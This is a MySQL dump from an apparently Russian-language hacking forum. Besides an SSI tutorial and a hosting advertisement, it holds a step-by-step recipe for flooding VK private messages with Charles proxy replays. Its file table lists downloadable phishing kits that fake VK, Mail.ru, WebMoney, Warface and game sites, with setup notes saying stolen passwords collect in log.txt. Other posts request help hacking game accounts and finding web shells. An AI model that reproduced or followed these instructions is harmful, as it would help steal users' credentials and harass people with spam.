INSERT INTO f_them VALUES("9","116","(s)html include","30","0","0","1426440092","Д ля этих целей существует технология SSI<br />(Server Side Includes) - Включения на стороне<br />сервера.<br />SSI - это директивы, вставляемые<br />непосредственно в HTML и служащие для<br />передачи указаний Web-серверу. Встречая<br />такие директивы, Web-сервер интерпретирует<br />их и выполняет соответствующие действия<br />(вставка HTML-фрагмента из другого файла,<br />динамическое формирование страниц и так<br />далее)<br />На самом деле эта наука заслуживает<br />отдельного учебника, но мы здесь не будем<br />вдаваться в подробности, а решим с помощью<br />данной технологии нашу конкретную задачу.<br />Теперь по порядку.. будьте внимательны!!<br />Первое что нам необходимо сделать,<br />это переименовать наш файл<br />index.html на index.shtml - именно такое<br />расширение файла указывает Web-<br />серверу на то, что мы собираемся<br />использовать SSI<br />Вырезаем из файла index.shtml куски<br />кода которые будут повторятся на<br />всех страницах сайта (в примере они<br />выделены цветами) и сохраняем их<br />отдельными файлами с расширением<br />*.txt назовём, их к примеру:<br />header.txt - файл с кодом "шапки" сайта<br />menu.txt - файл с кодом меню сайта<br />footer.txt - файл с кодом "подвала" сайта<br />- обычно такие кусочки кода<br />сохраняют в отдельной папке под<br />именем include<br />Вставляем в нужные места кода<br />файла index.shtml директивы -<br />включения на стороне севера<br />Пишутся эти директивы в виде<br />комментариев вот так:<br /><!--#include virtual="include/menu.txt"--><br />- так например эта строчка заменит<br />собой отсутствующий код с меню<br />сайта и будет его черпать из файла<br />menu.txt который лежит в папке<br />include .<br />В результате всех этих манёвров у нас<br />должно получиться четыре файла:<br /><br />[code]<br /><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML<br />4.01 Transitional//EN" "http://www.w3.org/TR/<br />html4/loose.dtd"><br /><html><br /><head><br /><title>Включения на стороне сервера</<br />title><br /></head><br /><body><br /><table border="1" align="center"<br />width="640" height="480" cellspacing="0"<br />cellpadding="15"><br /><!--#include virtual="include/<br />header.txt"--><br /><tr><br /><!--#include virtual="include/<br />menu.txt"--><br /><td><br /><h4>Содержание сайта</h4><br />Здесь основное содержание<br />сайта, куча текста, рисунки, графики,<br />таблицы.. контент короче.. И что интересно по<br />сравнению с другими будущими страницами<br />данного сайта меняться будет только эта<br />ячейка! Ячейки с шапкой, подвалом, меню<br />сайта будут точно такими же как и на всех<br />остальных страницах.<br /></td><br /></tr><br /><!--#include virtual="include/<br />footer.txt"--><br /></table><br /></body><br /></html><br /><br />[/code]<br />","0","39","1426440092","","","","","");
INSERT INTO f_them VALUES("10","97","Сделать статью?","36","0","0","1426441127","Про KVM вдски и где их выгодно покупать.<br />И тутор по установке на kvm винду, тоже писать? Гг","0","37","1426444590","","","","","");
INSERT INTO f_them VALUES("11","97","Рекламная сеть","18","0","0","1426442812","помогите с настройкой рекламы на wk","0","37","1426489464","","","","","");
INSERT INTO f_them VALUES("12","97","программа","27","0","0","1426488738","может укавонибудь есть программа для накрутки в контакте для андроида?","0","37","1426511508","","","","","");
INSERT INTO f_them VALUES("13","78","Спамим в ЛС VK за 1-2 минуты!","21","0","0","1426489972","1. Скачиваем прогу Charles<br />2. Логинимся ВК через Мозиллу.<br />3. Выбираем жертву)) Создаём<br />беседу (вы и 2 человека).<br />4. Запускаем прогу Charles<br />5. Выходим из беседы и заново<br />вступаем в неё.<br />6. В проге выбираем правой<br />кнопкой мыши http://vk.com потом<br />--> Repeat Advanced в первой<br />строке пишем количество, сколько<br />нужно спама (обычно не больше<br />1000), в другой пишем 32 --> ОК .<br />7. PROFIT!<br />P.S. Спам будет до того, пока<br />сервер не перестанет отвечать! То-<br />есть может выйти 200 сообщений,<br />400, максимально я доходил до 800<br />сообщений за 2 мин.<br />P.P.S. Если вы предполагаете<br />вариант, что ваш друг может выйти<br />из беседы, тогда проделайте всё<br />это с ним, то-есть в пункте 5<br />удалите из беседы друга а затем<br />снова пригласите.<br />Копипаст темы, за неработоспособность не отвечаю","0","36","1426489972","","","","","");
INSERT INTO f_them VALUES("14","78","2domains изменила тарифы","1","0","0","1426492743","Сегодня стало известно о смене тарифов на 2domains<br />Теперь продление там по 299, 199, и 149 рублей (взависимости сколько у вас доменов)<br />Согласитесь, цены офигеть какие","0","36","1426914725","Как вам новые цены?","Отличные","Не очень","Плохие","Ужасные. Нужно искат");
INSERT INTO f_them VALUES("17","71","Помогити защитить","49","0","49","1426568179","Найдите шели на сайте буду блогодарен вот сайт skolhoz.ru","0","31","1426841792","","","","","");
INSERT INTO f_them VALUES("18","96","Помочь кх","49","0","0","1426568225","Сайт от зломов вот сайт skolhoz.ru","0","31","1426572319","","","","","");
INSERT INTO f_them VALUES("27","96","Взлом)г","155","0","0","1437810458","Нужно взломать персов в онлайн игре,любым удобным способом.Могу заплатить деньги,пишите..","0","31","1437820245","","","","","");
INSERT INTO f_them VALUES("20","77","Взлом это просто!","29","0","29","1426875197","Тестим) [url=http://servak.ga/]тык[/url]","0","36","1436876155","","","","","");
INSERT INTO f_them VALUES("21","78","Garantos.ru - домены,хостинг, VPS,сервера","6","0","6","1426915425","И так всем доброго времени суток,наша так сказать СО "Гарантос" готово официально отрекомендовать реселлера доменных имен<br />Мы официальный партнер reg.ru и находимся в списке партнеров http://reg.ru/reseller/list2<br />_____________________________<br />http://garantos.ru/skins/default/images/b-header_logo.png<br /><br />[url=http://garantos.ru/registration/?friend_code=129081320471145]>>>Перейти на сайт<<<[/url]<br /><br /><br />Хочу так же заметить,что "Гарантос" является не только реселером доменных имен в популярных доменных зонах,но так же предоставляет услуги хостинга сайтов,vps,аренда физ.серверов и многое другое.<br />По поводу работы сервисов проекта обращаться в тех.поддержку.<br /><br /> Сейчас в кратце ознакомлю вас с нашими тарифами на наши услуги.<br /><br />[url=http://garantos.ru/price]>>>Тарифы на домены<<<[/url] -В этом разделе указаны все цены в рублях на популярные доменные зоны.<br /><br />[url=http://garantos.ru/hosting/order.php]>>>Тарифы на хостинг<<<[/url] - В этом разделе указаны все тарифные планы на хостинг сайтов.<br /><br />[url=http://garantos.ru/vps/order.php]>>>Тарифы на VPS<<<[/url]- Скидки до 20% при оплате за 3 и более месяцев,гарантированный возврат денег при отказе от услуги за неиспользованный период.<br /><br /><br />[url=http://garantos.ru/dedicated/order.php]>>>Тарифы на сервера<<<[/url]- множество тарифов на аренду физ.серверов<br /><br /><br />[url=http://garantos.ru/ssl/order.php]>>>Тарифы на SSL сертификаты<<<[/url] - выгодные тарифы на аренду сертификатов<br /><br /><br /><br />[url=http://garantos.ru/domains/transfer.php]^^^^^ПЕРЕНОС ДОМЕНОВ К НАМ^^^^^^[/url]<br /><br />Ну и множество популярных услуг таких как <br />[b]- помощь по подбору доменного имени<br />- web-forwarding <br />- Расширенная защита от спама<br />- Заказ Google Apps для домена<br />- Гарант сделки при покупке/продаже доменов<br />- Премиум-домены в зонах .RU / .РФ / .SU / .RU.COM / .ORG<br />[/b]<br />У нас более 30 способов оплаты,но на данный момент мы подключили 2 важных способа оплаты это <br />1 вариант) оплата заказов через сервис Webmoney в wmr в автоматическом режиме<br />2 вариант) подключили сервис z-payment для оплаты другими популярными способами,в скоре подключим все на прямую.<br /><br />Спасибо за внимание команда http://garantos.<br />[u]Внимание !!!!!!!!! [/u]<br />[b]Все наверняка читали новости 2domains и всех возмутил резкий подъем цен на продление ru/рф доменных зон,мы посовещались и решили,что наш проект http://garantos.ru не намерен поднимать цену на продление этих доменных зон,но другие зоны немножко возрастут в цене,за счет этого мы сможем позволить себе покрывать расходы на продление ru/рф. спасибо за внимание![/b]","0","36","1436961059","","","","","");
INSERT INTO f_them VALUES("22","71","шеллы/дыры","72","0","0","1426924953","научите пользоваться шеллами? и искать дыры на сайте? очень прошу)","0","31","1436960502","","","","","");
INSERT INTO f_them VALUES("23","96","DCMS Social есть ли уязвимости?","19","0","0","1427108523","Помогите найти:)","0","31","1427545111","","","","","");
INSERT INTO f_them VALUES("26","97","Однако здраствуйте)","131","0","0","1437290038","Всем привет) Кто знает меня тому большой привет) <br />А кто меня не знает то давайте знакомится)))","0","37","1437762785","","","","","");
INSERT INTO f_them VALUES("28","75","Ищу сканер уязвимостей","160","0","0","1437983513","Если есть в кого хароший, дайте пожалуста!","0","31","1438066984","","","","","");
INSERT INTO f_them VALUES("29","101","тест","94","0","0","1438148329","тест","0","38","1438148607","","","","","");
DROP TABLE IF EXISTS `f_votes`;
CREATE TABLE `f_votes` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`them` int(11) NOT NULL DEFAULT '0',
`var` smallint(1) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=300 DEFAULT CHARSET=utf8;
INSERT INTO f_votes VALUES("1","17","69","1");
INSERT INTO f_votes VALUES("2","63","71","1");
INSERT INTO f_votes VALUES("3","6","71","2");
INSERT INTO f_votes VALUES("4","76","71","3");
INSERT INTO f_votes VALUES("5","27","71","3");
INSERT INTO f_votes VALUES("6","17","71","1");
INSERT INTO f_votes VALUES("7","26","71","3");
INSERT INTO f_votes VALUES("8","26","69","2");
INSERT INTO f_votes VALUES("9","44","69","1");
INSERT INTO f_votes VALUES("10","44","71","3");
INSERT INTO f_votes VALUES("11","99","69","2");
INSERT INTO f_votes VALUES("12","0","71","1");
INSERT INTO f_votes VALUES("16","200","3830","1");
INSERT INTO f_votes VALUES("15","27","3830","1");
INSERT INTO f_votes VALUES("17","17","3830","1");
INSERT INTO f_votes VALUES("18","168","3830","1");
INSERT INTO f_votes VALUES("19","26","3830","2");
INSERT INTO f_votes VALUES("20","99","3830","2");
INSERT INTO f_votes VALUES("21","173","3830","1");
INSERT INTO f_votes VALUES("22","0","3830","2");
INSERT INTO f_votes VALUES("23","294","3830","1");
INSERT INTO f_votes VALUES("24","0","3818","1");
INSERT INTO f_votes VALUES("25","307","3818","3");
INSERT INTO f_votes VALUES("26","310","3830","1");
INSERT INTO f_votes VALUES("27","99","3862","1");
INSERT INTO f_votes VALUES("28","4","3862","1");
INSERT INTO f_votes VALUES("29","294","3862","1");
INSERT INTO f_votes VALUES("30","299","3862","1");
INSERT INTO f_votes VALUES("31","0","3862","1");
INSERT INTO f_votes VALUES("32","224","3862","1");
INSERT INTO f_votes VALUES("33","17","3862","1");
INSERT INTO f_votes VALUES("34","1","3862","1");
INSERT INTO f_votes VALUES("35","1","3866","1");
INSERT INTO f_votes VALUES("36","371","3938","1");
INSERT INTO f_votes VALUES("37","0","3938","2");
INSERT INTO f_votes VALUES("38","353","3938","2");
INSERT INTO f_votes VALUES("39","350","3938","1");
INSERT INTO f_votes VALUES("40","114","3938","2");
INSERT INTO f_votes VALUES("41","1","3938","2");
INSERT INTO f_votes VALUES("42","50","3938","1");
INSERT INTO f_votes VALUES("43","355","3938","1");
INSERT INTO f_votes VALUES("44","303","3938","2");
INSERT INTO f_votes VALUES("45","0","3947","2");
INSERT INTO f_votes VALUES("46","353","3947","3");
INSERT INTO f_votes VALUES("47","2","3947","2");
INSERT INTO f_votes VALUES("48","371","3947","2");
INSERT INTO f_votes VALUES("49","3","3951","1");
INSERT INTO f_votes VALUES("50","353","3951","1");
INSERT INTO f_votes VALUES("51","2","3951","3");
INSERT INTO f_votes VALUES("52","350","3951","1");
INSERT INTO f_votes VALUES("53","114","3951","1");
INSERT INTO f_votes VALUES("54","0","3951","3");
INSERT INTO f_votes VALUES("55","3","3961","1");
INSERT INTO f_votes VALUES("56","1","3961","1");
INSERT INTO f_votes VALUES("57","353","3961","3");
INSERT INTO f_votes VALUES("58","388","3961","1");
INSERT INTO f_votes VALUES("59","114","3961","1");
INSERT INTO f_votes VALUES("60","224","3961","1");
INSERT INTO f_votes VALUES("61","4","3961","3");
INSERT INTO f_votes VALUES("62","355","3961","1");
INSERT INTO f_votes VALUES("63","0","3961","2");
INSERT INTO f_votes VALUES("64","360","3961","3");
INSERT INTO f_votes VALUES("65","3","3968","2");
INSERT INTO f_votes VALUES("66","371","3968","2");
INSERT INTO f_votes VALUES("67","392","3961","2");
INSERT INTO f_votes VALUES("68","50","3968","1");
INSERT INTO f_votes VALUES("69","371","3961","2");
INSERT INTO f_votes VALUES("70","353","3968","1");
INSERT INTO f_votes VALUES("71","0","3968","1");
INSERT INTO f_votes VALUES("72","1","3968","1");
INSERT INTO f_votes VALUES("73","4","3968","1");
INSERT INTO f_votes VALUES("74","390","3947","2");
INSERT INTO f_votes VALUES("75","353","4123","2");
INSERT INTO f_votes VALUES("76","0","4123","2");
INSERT INTO f_votes VALUES("77","2","4123","1");
INSERT INTO f_votes VALUES("78","537","4171","2");
INSERT INTO f_votes VALUES("79","1","4171","2");
INSERT INTO f_votes VALUES("80","353","4171","2");
INSERT INTO f_votes VALUES("81","455","4171","2");
INSERT INTO f_votes VALUES("82","363","4171","2");
INSERT INTO f_votes VALUES("83","519","4171","2");
INSERT INTO f_votes VALUES("84","1","4182","1");
INSERT INTO f_votes VALUES("85","4","4182","1");
INSERT INTO f_votes VALUES("86","470","4182","1");
INSERT INTO f_votes VALUES("87","531","4182","1");
INSERT INTO f_votes VALUES("88","3","4182","3");
INSERT INTO f_votes VALUES("89","529","4182","1");
INSERT INTO f_votes VALUES("90","353","4182","1");
INSERT INTO f_votes VALUES("91","434","4182","1");
INSERT INTO f_votes VALUES("92","2","4182","3");
INSERT INTO f_votes VALUES("93","522","4182","3");
INSERT INTO f_votes VALUES("94","539","4182","1");
INSERT INTO f_votes VALUES("95","80","4182","1");
INSERT INTO f_votes VALUES("96","519","4182","1");
INSERT INTO f_votes VALUES("97","294","4182","1");
INSERT INTO f_votes VALUES("98","431","4182","1");
INSERT INTO f_votes VALUES("99","511","4208","2");
INSERT INTO f_votes VALUES("100","489","4208","3");
INSERT INTO f_votes VALUES("101","487","4208","4");
INSERT INTO f_votes VALUES("102","3","4208","4");
INSERT INTO f_votes VALUES("103","531","4208","4");
INSERT INTO f_votes VALUES("104","4","4208","2");
INSERT INTO f_votes VALUES("105","363","4208","1");
INSERT INTO f_votes VALUES("106","392","4208","3");
INSERT INTO f_votes VALUES("107","519","4208","2");
INSERT INTO f_votes VALUES("108","224","4208","2");
INSERT INTO f_votes VALUES("110","390","4171","2");
INSERT INTO f_votes VALUES("111","73","4270","1");
INSERT INTO f_votes VALUES("112","3","4270","1");
INSERT INTO f_votes VALUES("113","294","4270","4");
INSERT INTO f_votes VALUES("114","593","4270","3");
INSERT INTO f_votes VALUES("115","2","4270","1");
INSERT INTO f_votes VALUES("116","668","4270","1");
INSERT INTO f_votes VALUES("117","390","4270","1");
INSERT INTO f_votes VALUES("118","681","4270","1");
INSERT INTO f_votes VALUES("119","490","4270","1");
INSERT INTO f_votes VALUES("120","268","4270","1");
INSERT INTO f_votes VALUES("121","200","4270","1");
INSERT INTO f_votes VALUES("122","655","4270","1");
INSERT INTO f_votes VALUES("123","648","4299","1");
INSERT INTO f_votes VALUES("124","788","4299","1");
INSERT INTO f_votes VALUES("125","629","4299","3");
INSERT INTO f_votes VALUES("126","791","4370","1");
INSERT INTO f_votes VALUES("127","97","4370","2");
INSERT INTO f_votes VALUES("128","763","4370","2");
INSERT INTO f_votes VALUES("129","432","4370","2");
INSERT INTO f_votes VALUES("130","569","4370","2");
INSERT INTO f_votes VALUES("131","4","4370","1");
INSERT INTO f_votes VALUES("132","878","4370","2");
INSERT INTO f_votes VALUES("133","668","4370","1");
INSERT INTO f_votes VALUES("134","390","4370","2");
INSERT INTO f_votes VALUES("135","851","4380","1");
INSERT INTO f_votes VALUES("136","97","4380","4");
INSERT INTO f_votes VALUES("137","4","4380","2");
INSERT INTO f_votes VALUES("138","1","4380","3");
INSERT INTO f_votes VALUES("139","763","4380","4");
INSERT INTO f_votes VALUES("140","569","4380","3");
INSERT INTO f_votes VALUES("141","2","4380","3");
INSERT INTO f_votes VALUES("142","432","4380","3");
INSERT INTO f_votes VALUES("143","0","4270","1");
INSERT INTO f_votes VALUES("144","0","4171","1");
INSERT INTO f_votes VALUES("145","0","4182","1");
INSERT INTO f_votes VALUES("146","891","4405","2");
INSERT INTO f_votes VALUES("147","390","4405","2");
INSERT INTO f_votes VALUES("148","200","4405","2");
INSERT INTO f_votes VALUES("149","0","4370","1");
INSERT INTO f_votes VALUES("150","432","4405","2");
INSERT INTO f_votes VALUES("151","878","4405","1");
INSERT INTO f_votes VALUES("152","1","4405","2");
INSERT INTO f_votes VALUES("153","489","4424","1");
INSERT INTO f_votes VALUES("154","3","4424","4");
INSERT INTO f_votes VALUES("155","785","4424","1");
INSERT INTO f_votes VALUES("156","200","4424","1");
INSERT INTO f_votes VALUES("157","470","4424","1");
INSERT INTO f_votes VALUES("158","164","4424","4");
INSERT INTO f_votes VALUES("159","573","4424","1");
INSERT INTO f_votes VALUES("160","878","4424","4");
INSERT INTO f_votes VALUES("161","363","4424","2");
INSERT INTO f_votes VALUES("162","432","4424","1");
INSERT INTO f_votes VALUES("163","2","4424","3");
INSERT INTO f_votes VALUES("164","0","4380","1");
INSERT INTO f_votes VALUES("165","531","4424","4");
INSERT INTO f_votes VALUES("166","891","4424","1");
INSERT INTO f_votes VALUES("167","457","4424","3");
INSERT INTO f_votes VALUES("168","411","4424","1");
INSERT INTO f_votes VALUES("169","490","4424","1");
INSERT INTO f_votes VALUES("170","303","4424","1");
INSERT INTO f_votes VALUES("171","0","4208","1");
INSERT INTO f_votes VALUES("172","390","4424","1");
INSERT INTO f_votes VALUES("173","608","4424","1");
INSERT INTO f_votes VALUES("174","740","4370","1");
INSERT INTO f_votes VALUES("175","0","4424","1");
INSERT INTO f_votes VALUES("176","0","4299","1");
INSERT INTO f_votes VALUES("177","0","4405","1");
INSERT INTO f_votes VALUES("178","1072","4171","1");
INSERT INTO f_votes VALUES("179","1088","3938","1");
INSERT INTO f_votes VALUES("180","489","4539","2");
INSERT INTO f_votes VALUES("181","363","4539","2");
INSERT INTO f_votes VALUES("182","1098","4539","1");
INSERT INTO f_votes VALUES("183","1092","4539","2");
INSERT INTO f_votes VALUES("187","643","4580","1");
INSERT INTO f_votes VALUES("186","530","4580","1");
INSERT INTO f_votes VALUES("188","1170","4171","2");
INSERT INTO f_votes VALUES("189","798","4598","2");
INSERT INTO f_votes VALUES("190","77","4598","1");
INSERT INTO f_votes VALUES("191","489","4598","1");
INSERT INTO f_votes VALUES("192","200","4598","1");
INSERT INTO f_votes VALUES("193","891","4598","1");
INSERT INTO f_votes VALUES("194","1176","4598","1");
INSERT INTO f_votes VALUES("195","538","4598","1");
INSERT INTO f_votes VALUES("196","852","4598","2");
INSERT INTO f_votes VALUES("197","490","4598","2");
INSERT INTO f_votes VALUES("198","821","4598","2");
INSERT INTO f_votes VALUES("199","1170","4598","1");
INSERT INTO f_votes VALUES("200","489","4630","2");
INSERT INTO f_votes VALUES("201","531","4630","2");
INSERT INTO f_votes VALUES("202","798","4630","2");
INSERT INTO f_votes VALUES("203","3","4630","1");
INSERT INTO f_votes VALUES("204","1","4630","1");
INSERT INTO f_votes VALUES("205","325","4689","1");
INSERT INTO f_votes VALUES("206","1","4689","1");
INSERT INTO f_votes VALUES("207","1033","4694","2");
INSERT INTO f_votes VALUES("208","325","4694","1");
INSERT INTO f_votes VALUES("209","325","4737","1");
INSERT INTO f_votes VALUES("210","3","4737","1");
INSERT INTO f_votes VALUES("211","1249","4737","1");
INSERT INTO f_votes VALUES("212","1","4737","3");
INSERT INTO f_votes VALUES("213","821","4737","1");
INSERT INTO f_votes VALUES("214","1170","4737","1");
INSERT INTO f_votes VALUES("215","1309","4737","2");
INSERT INTO f_votes VALUES("216","3","4738","3");
INSERT INTO f_votes VALUES("217","538","4738","2");
INSERT INTO f_votes VALUES("218","1064","4738","1");
INSERT INTO f_votes VALUES("219","2","4737","2");
INSERT INTO f_votes VALUES("220","1135","4738","1");
INSERT INTO f_votes VALUES("221","10","4737","3");
INSERT INTO f_votes VALUES("222","1127","4738","1");
INSERT INTO f_votes VALUES("223","325","4738","2");
INSERT INTO f_votes VALUES("224","920","4738","2");
INSERT INTO f_votes VALUES("225","325","4745","1");
INSERT INTO f_votes VALUES("226","2","4745","1");
INSERT INTO f_votes VALUES("227","200","4745","1");
INSERT INTO f_votes VALUES("228","639","4745","1");
INSERT INTO f_votes VALUES("229","538","4745","1");
INSERT INTO f_votes VALUES("230","3","4745","1");
INSERT INTO f_votes VALUES("231","1088","4745","2");
INSERT INTO f_votes VALUES("232","1088","4738","1");
INSERT INTO f_votes VALUES("233","1271","4738","2");
INSERT INTO f_votes VALUES("234","1271","4745","2");
INSERT INTO f_votes VALUES("235","1","4745","1");
INSERT INTO f_votes VALUES("236","1253","4738","3");
INSERT INTO f_votes VALUES("237","1249","4754","1");
INSERT INTO f_votes VALUES("238","1127","4754","1");
INSERT INTO f_votes VALUES("239","363","4754","1");
INSERT INTO f_votes VALUES("240","1271","4754","1");
INSERT INTO f_votes VALUES("241","1152","4754","1");
INSERT INTO f_votes VALUES("242","573","4754","1");
INSERT INTO f_votes VALUES("243","2","4754","3");
INSERT INTO f_votes VALUES("244","1260","4754","1");
INSERT INTO f_votes VALUES("245","3","4754","1");
INSERT INTO f_votes VALUES("246","325","4754","1");
INSERT INTO f_votes VALUES("247","263","4754","1");
INSERT INTO f_votes VALUES("248","1327","4754","1");
INSERT INTO f_votes VALUES("249","1335","4754","3");
INSERT INTO f_votes VALUES("250","1254","4738","1");
INSERT INTO f_votes VALUES("251","1335","4738","3");
INSERT INTO f_votes VALUES("252","363","4738","1");
INSERT INTO f_votes VALUES("253","257","4738","1");
INSERT INTO f_votes VALUES("254","97","4738","1");
INSERT INTO f_votes VALUES("255","1295","4738","1");
INSERT INTO f_votes VALUES("256","1200","4738","2");
INSERT INTO f_votes VALUES("257","1159","4738","2");
INSERT INTO f_votes VALUES("258","1199","4738","1");
INSERT INTO f_votes VALUES("259","1152","4738","3");
INSERT INTO f_votes VALUES("260","1368","4745","2");
INSERT INTO f_votes VALUES("261","1","3947","2");
INSERT INTO f_votes VALUES("262","32361","4871","1");
INSERT INTO f_votes VALUES("263","1","4871","1");
INSERT INTO f_votes VALUES("264","1254","4871","2");
INSERT INTO f_votes VALUES("265","1057","4871","1");
INSERT INTO f_votes VALUES("266","1143","4871","1");
INSERT INTO f_votes VALUES("267","636","4871","2");
INSERT INTO f_votes VALUES("268","1190","4871","2");
INSERT INTO f_votes VALUES("269","32371","4871","2");
INSERT INTO f_votes VALUES("270","32335","4871","2");
INSERT INTO f_votes VALUES("271","32400","4922","1");
INSERT INTO f_votes VALUES("272","1254","4922","1");
INSERT INTO f_votes VALUES("273","1","4922","4");
INSERT INTO f_votes VALUES("274","1368","4942","1");
INSERT INTO f_votes VALUES("275","32257","4942","2");
INSERT INTO f_votes VALUES("276","32433","4942","1");
INSERT INTO f_votes VALUES("277","639","4942","1");
INSERT INTO f_votes VALUES("278","1076","4942","1");
INSERT INTO f_votes VALUES("279","80","4942","3");
INSERT INTO f_votes VALUES("280","32391","4942","1");
INSERT INTO f_votes VALUES("281","32427","4942","3");
INSERT INTO f_votes VALUES("282","32447","4942","3");
INSERT INTO f_votes VALUES("283","224","4942","1");
INSERT INTO f_votes VALUES("284","32400","4942","1");
INSERT INTO f_votes VALUES("285","1127","4942","1");
INSERT INTO f_votes VALUES("286","778","4942","1");
INSERT INTO f_votes VALUES("287","32312","4942","1");
INSERT INTO f_votes VALUES("288","470","4942","1");
INSERT INTO f_votes VALUES("289","10","4942","1");
INSERT INTO f_votes VALUES("290","1","4942","1");
INSERT INTO f_votes VALUES("291","325","4942","1");
INSERT INTO f_votes VALUES("292","1152","4942","1");
INSERT INTO f_votes VALUES("293","1","14","4");
INSERT INTO f_votes VALUES("294","36","14","4");
INSERT INTO f_votes VALUES("295","30","14","2");
INSERT INTO f_votes VALUES("296","51","14","4");
INSERT INTO f_votes VALUES("297","39","14","2");
INSERT INTO f_votes VALUES("298","27","14","4");
INSERT INTO f_votes VALUES("299","43","14","3");
DROP TABLE IF EXISTS `fo_cat`;
CREATE TABLE `fo_cat` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` char(30) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=utf8;
INSERT INTO fo_cat VALUES("14","Локальный диск (C:)");
DROP TABLE IF EXISTS `fo_files`;
CREATE TABLE `fo_files` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`url` char(100) NOT NULL,
`time` int(11) NOT NULL,
`clicks` int(11) NOT NULL DEFAULT '0',
`author` int(11) NOT NULL,
`title` char(100) NOT NULL,
`info` text NOT NULL,
`parol` char(10) DEFAULT NULL,
`moder` smallint(2) NOT NULL DEFAULT '0',
`rid` int(11) NOT NULL DEFAULT '0',
`cat` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=37 DEFAULT CHARSET=utf8;
INSERT INTO fo_files VALUES("1","files/32040Feik_Barbars.ru by Mukpomup.zip","1426411984","1","1","Фейк варваров by mukpomup","************************<br />Разработчик: mukpomup<br />Сайт разработчика: mukpomup.ru<br />E-mail: admin@mukpomup.ru<br />************************<br />1)Распаковать архив.<br />2)Изменить в некоторых файлах<br />test.mukpomup.ru, на свой сайт.<br />3)Пароли хранятся в log.txt<br />4)Поставить права 700..<br />************************<br />При снятии ссылки "Бесплатная Валюта на<br />kolhoz.mobi"<br />Больше ни каких фейков в пабл не попадет от<br />меня.<br />************************<br />Уважайте права АВТОРА.<br />************************<br />Написание индивидуальных фейков платно:)<br />Мой координаты выше.<br />---","0","0","14","78");
INSERT INTO fo_files VALUES("2","files/76670feik Biggonki_By_mukpomup.zip","1426412207","0","1","Фейк Больших гонок","Разработчик: mukpomup<br />Сайт разработчика: mukpomup.ru<br />E-mail: Black_Russian94@spaces.ru<br />************************<br />1)Распаковать архив.<br />2)Изменить в некоторых файлах<br />test.mukpomup.ru на свой сайт.<br />3)Пароли хранятся в log.txt<br />4)Поставить права 700..","0","0","14","78");
INSERT INTO fo_files VALUES("3","files/33284Feik_Spaces.ru_By Mukpomup.zip","1426412293","0","1","Фейк Spaces","************************<br />Разработчик: mukpomup<br />Сайт разработчика: mukpomup.ru<br />E-mail: Black_Russian94@spaces.ru<br />************************<br />1)Распаковать архив.<br />2)Изменить в некоторых файлах<br />test.mukpomup.ru (Особенно в ok.php), на свой<br />сайт.<br />3)Пароли хранятся в log.txt<br />4)Поставить права 700..<br />************************<br />Побольше лохов))<br />************************<br />Копирайт не снимать!<br />Уважайте права АВТОРА.","0","0","14","78");
INSERT INTO fo_files VALUES("4","files/44743Bymukpomup.zip","1426412377","1","1","Фейк Колхоза","Фейк колхоза:) автор я:) реадми внутри:)<br />************************<br />Разработчик: mukpomup<br />Сайт разработчика: mukpomup.ru<br />E-mail: Black_Russian94@spaces.ru<br />************************<br />1)Распаковать архив.<br />2)Изменить в некоторых файлах<br />kolhozbonus.tk, на свой сайт.<br />3)Пароли хранятся в log.txt<br />4)Поставить права 700..<br />************************<br />Как спамить без угрозы для основы?<br />************************<br />Закройте браузер с которого вы заходите на<br />основу (ВСЕГДА)<br />и откройте другой браузер с которго вы<br />НИКОГДА не заходили.<br />Все:)<br />В колхоз.моби вычисление по коду браузера.<br />************************<br />Возникли вопросы?<br />Есть предложения?<br />Support@mukpomup.ru<br />--<br />от + в анкету не откажусь:)","0","0","14","78");
INSERT INTO fo_files VALUES("5","files/59140feika.zip","1426420186","0","1","Фейк Mаil.ru","Фейк системы Mail.RU","0","0","14","78");
INSERT INTO fo_files VALUES("6","files/25666Mobimeet.zip","1426420269","0","1","Фейк Мобимеет","Фейк Мобимеет<br />автор:AKDEPE<br />ОФиц сайт:WWW.MOBIMEET.COM","0","0","14","78");
INSERT INTO fo_files VALUES("7","files/17558Feik-SG.zip","1426420307","0","1","Фейк супер гонок 2011","Это самый лучший и красивый феик СУПЕР ГОНОК ! пример Diler.wen.ru Реадми в нутри !<br />Создатель Sk_лидер","0","0","14","78");
INSERT INTO fo_files VALUES("8","files/37301webmoney_fake_spacesru.zip","1426420365","0","1","Фейк WebMoney","фейк webmaney сохр.пароли<br />автор не я<br />","0","0","14","78");
INSERT INTO fo_files VALUES("12","files/42804Skripty_CODERAM_6292_2521_2985_veik_warface.zip","1426420797","0","1","Фейк WARFACE","Меняем мыло в файле log.php на свое.. радуемся)))<br />туда приходит логин и пароль..<br />Слито и доработано by Лань","0","0","14","78");
INSERT INTO fo_files VALUES("11","files/17114klybok_net_vten_feik_by_JIyboBHuK.zip","1426420541","0","1","Фейк Мир теней","Фейк Мир теней, в пабле оказался из-за барыг","0","0","14","78");
INSERT INTO fo_files VALUES("24","files/58476feik by cruger 207 and... .zip","1426421447","0","1","gear-games","Фейк Gear-games by cruger 207 and Waylander<br />Пароль от архива:1111<br />Faq в архиве <br />Ценим","0","0","14","78");
INSERT INTO fo_files VALUES("25","files/74653WaylandeR.zip","1426421505","0","1","Naemniki","Пароль от архива 1111<br />Уважайте автора : WaylandeR and CrugeR 207<br />FAQ нету внутри фейк<br />Скрипт: Новый год<br />","0","0","14","78");
INSERT INTO fo_files VALUES("14","files/98851Vkontakte.zip","1426420902","0","1","Фейк Вконтакте","Работает на все 101% автор Я. Читайте реадми и пользуйтесь.<br />","0","0","14","78");
INSERT INTO fo_files VALUES("15","files/73343tiwar.mobi.zip","1426420947","0","1","Феик Битва титанов","************************<br />Разработчик: Ivancom<br />************************<br />1)Распаковать архив.<br />2)Изменить в некоторых файлах (ваш_саит), на<br />свой сайт.<br />3)Пароли хранятся в login.txt<br />4)Поставить права 700..<br />************************<br />Больше ни каких фейков в пабл не попадет от меня.<br />************************<br />Уважайте права АВТОРА.<br />************************<br />Написание индивидуальных фейков платно:)<br />Мой координаты выше.<br />---","0","0","14","78");
